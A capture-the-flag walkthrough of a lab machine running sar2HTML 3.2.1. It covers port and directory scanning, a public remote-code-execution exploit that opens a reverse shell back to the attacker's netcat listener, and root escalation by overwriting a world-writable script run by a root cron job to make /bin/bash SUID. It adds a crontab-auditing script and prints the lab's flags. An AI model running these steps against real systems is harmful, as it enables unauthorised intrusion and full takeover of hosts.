Key points
- Path enumeration
- Privilege escalation via a root cron job
Steps
A full-range nmap scan shows only port 80 open:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 19:13 CST
Nmap scan report for 172.16.33.13
Host is up (0.035s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.78 seconds
Directory enumeration with gobuster finds phpinfo.php and robots.txt, and robots.txt contains a single entry pointing at the sar2HTML directory:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.16.33.13
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.htaccess.php (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htpasswd.php (Status: 403) [Size: 277]
/phpinfo.php (Status: 200) [Size: 95390]
/robots.txt (Status: 200) [Size: 9]
/server-status (Status: 403) [Size: 277]
Progress: 40952 / 40954 (100.00%)
===============================================================
Finished
Browsing to /sar2HTML/ shows the application is sar2HTML 3.2.1, and a quick search shows that this version has a known remote code execution vulnerability.
A public exploit for it is available at
https://github.com/Jsmoreira02/sar2HTML_exploit
Its shell_mode option delivers a reverse shell directly:
┌──(kali㉿Timothy)-[~/Documents/GooAnn/172.16.33.13]
└─$ python sar2html_exploit.py http://172.16.33.13/sar2HTML --shell_mode
[tool banner omitted]
[+] URL found! Starting shell upload...
------------------------------
LHOST= 10.8.0.204
LPORT= 80
------------------------------
[+] Creating process...
---> Server started http://127.0.0.1:8000
---> Listening on port 80
Can't grab 0.0.0.0:80 with bind : Permission denied
[!] SHELL upload is possible in the target!
Spawning your shell :)
The exploit's built-in listener could not bind port 80 because the script was not running as root, so the callback is caught with a separate listener started with sudo instead:
┌──(kali㉿Timothy)-[~/Documents/GooAnn/172.16.33.13]
└─$ sudo nc -nlvp 80
[sudo] password for kali:
listening on [any] 80 ...
connect to [10.8.0.204] from (UNKNOWN) [172.16.33.13] 53186
bash: cannot set terminal process group (774): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sudo -l and a SUID search turn up nothing useful. Uploading and running linpeas.sh reveals the following cron entries:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
......
......
The finally.sh entry stands out: root runs it every five minutes from /var/www/html. Looking at it, finally.sh does nothing but call ./write.sh, and write.sh is world-writable (mode 777 and owned by www-data), so whatever we put in it will be executed as root.
www-data@sar:/var/www/html/sar2HTML$ cd /var/www/html/
cd /var/www/html/
www-data@sar:/var/www/html$ ls -l
ls -l
total 32
-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
-rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
drwxr-xr-x 4 www-data www-data 4096 Nov 16 16:07 sar2HTML
-rwxrwxrwx 1 www-data www-data 30 Nov 16 13:21 write.sh
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh
./write.sh
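As an added example (not part of this writeup, and not linpeas code), the following script generalises the finding above: it reads a system crontab, keeps the root entries, resolves the scripts they execute relative to any leading cd, and reports those whose mode bits let the current user modify them, following one level into each script so that a pattern like finally.sh calling ./write.sh is caught even though finally.sh itself is root-owned. The crontab and the files under the temporary directory are constructed for the demonstration; they mirror the box but nothing is read from the real target, and the function names are my own.

```bash
#!/bin/sh
# Added example, not from the writeup or linpeas: list scripts run by root
# cron entries that the current user could modify. A cron line that is
# root-owned can still be hijacked when a script it calls (directly, or one
# level down like finally.sh -> ./write.sh) is writable.
# Limitations: only the "m h dom mon dow user cmd" system-crontab format,
# @reboot-style lines are skipped, and group-writability is not checked.

set -f   # crontab fields contain '*'; never let the shell glob them

# True when the mode bits of a regular file let us modify it: world-writable,
# or owned by us with the owner-write bit. Mode bits are used instead of
# `test -w` so the result does not change when the audit is run as root.
is_modifiable() {
    [ -f "$1" ] || return 1
    [ -n "$(find "$1" -prune \( -perm -002 -o \( -user "$(id -un)" -perm -200 \) \) -print 2>/dev/null)" ]
}

# Working directory a cron command runs its relative paths from: the target
# of a leading "cd DIR &&", otherwise root's home (cron starts in $HOME).
# A trailing slash is dropped, so "cd /" yields the empty string, which
# resolve_path turns back into "/".
cron_cwd() {
    case "$1" in
        cd\ *) set -- $1; printf '%s\n' "${2%/}" ;;
        *)     printf '/root\n' ;;
    esac
}

# Map a command token to an absolute file path (absolute or ./relative
# tokens only); anything else is not a path we can check.
resolve_path() {
    case "$1" in
        /*)  printf '%s\n' "$1" ;;
        ./*) printf '%s/%s\n' "$2" "${1#./}" ;;
        *)   return 1 ;;
    esac
}

# Report modifiable scripts referenced by root entries in a crontab file,
# following one level into each referenced script.
# Usage: audit_cron_targets /etc/crontab
audit_cron_targets() {
    crontab_file=$1
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in [0-9*]*) ;; *) continue ;; esac   # skip comments, VAR=, @reboot
        set -- $line
        [ $# -ge 7 ] && [ "$6" = root ] || continue
        shift 6
        cmd="$*"
        cwd=$(cron_cwd "$cmd")
        for tok in $cmd; do
            path=$(resolve_path "$tok" "$cwd") || continue
            is_modifiable "$path" && printf '%s\n' "$path"
            [ -f "$path" ] && [ -r "$path" ] || continue
            # one level of indirection: paths named inside the script itself
            for itok in $(sed 's/[;&|]/ /g' "$path"); do
                ipath=$(resolve_path "$itok" "$cwd") || continue
                is_modifiable "$ipath" && printf '%s (via %s)\n' "$ipath" "$path"
            done
        done
    done < "$crontab_file"
    return 0
}

# Constructed lab mirroring the box: a crontab whose root entry runs
# finally.sh from a web root; finally.sh (mode 555) runs ./write.sh (777).
# Prints the lab directory.
build_lab() {
    lab=$(mktemp -d) || return 1
    mkdir -p "$lab/html"
    printf '#!/bin/sh\n./write.sh\n' > "$lab/html/finally.sh"
    chmod 555 "$lab/html/finally.sh"
    printf 'echo placeholder\n' > "$lab/html/write.sh"
    chmod 777 "$lab/html/write.sh"
    cat > "$lab/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root cd $lab/html/ && sudo ./finally.sh
EOF
    printf '%s\n' "$lab"
}

demo() {
    lab=$(build_lab)
    echo "root cron targets modifiable by $(id -un):"
    audit_cron_targets "$lab/crontab"
    rm -rf "$lab"
}

demo
```

On a real target, run audit_cron_targets against /etc/crontab and each file under /etc/cron.d as the low-privileged user you landed as; run as root it will (correctly) report every root-owned script, which is not the interesting answer. The one-level follow is deliberately shallow: it is enough for the wrapper-script pattern on this box without trying to parse arbitrary shell.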
Overwrite write.sh so that it sets the SUID bit on /bin/bash. Because the cron entry does cd /var/www/html/ before running finally.sh, the relative ./write.sh resolves to this file; no shebang is needed, since the shell falls back to interpreting it as a script when the kernel refuses to exec it directly.
www-data@sar:/var/www/html$ echo "chmod +s /bin/bash" >write.sh
echo "chmod +s /bin/bash" >write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
chmod +s /bin/bash
Within a few minutes (the job fires every five) the cron run has made /bin/bash SUID root. Launching it with -p keeps the effective uid of 0 instead of dropping privileges, and the escalation is complete:
www-data@sar:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1113504 Jun 7 2019 /bin/bash
www-data@sar:/var/www/html$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-4.4# cat /root/root.txt
cat /root/root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
bash-4.4# cat /home/love/Desktop/user.txt
cat /home/love/Desktop/user.txt
427a7e47deb4a8649c7cab38df232b52
bash-4.4#